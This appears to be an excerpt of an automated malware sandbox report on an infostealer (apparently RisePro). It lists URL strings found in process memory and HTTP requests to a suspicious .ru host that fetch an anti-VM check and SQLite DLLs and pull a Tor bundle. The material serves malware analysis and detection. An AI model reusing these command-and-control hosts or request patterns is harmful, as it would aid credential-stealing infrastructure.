AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 9AED.exe, 00000018.00000003.2560173451.000000000402D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002933000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.000000000427B000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000041EE000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004047000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002933000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.000000000425F000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.000000000402D000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004145000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000040B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002933000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: 4ZZ099qJ.exe, AppLaunch.exe, 00000009.00000002.2015163150.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2015163150.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/a%
Source: 4ZZ099qJ.exe, 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, AppLaunch.exe, 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-address
Source: AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/s
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052A4000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/156.146.49.168
Source: AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/156.146.49.168p
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/156.146.49.168
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: tor-real.exe, 0000001D.00000003.2250149203.0000000003915000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 0000001D.00000003.2217445246.00000000048EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: AppLaunch.exe, 00000009.00000002.2015163150.000000000526A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2031135122.00000000086DB000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2031135122.000000000869B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT)
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002933000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4ZZ099qJ.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: AppLaunch.exe, 00000009.00000002.2015163150.00000000052BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/8
Source: AppLaunch.exe, 00000009.00000002.2015163150.0000000005340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.torproject.org/
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warning
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis

Source: unknown

DNS traffic detected: queries for: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/156.146.49.168 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //antivm.php?id=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dlls/System.Data.SQLite.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dlls/x86/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
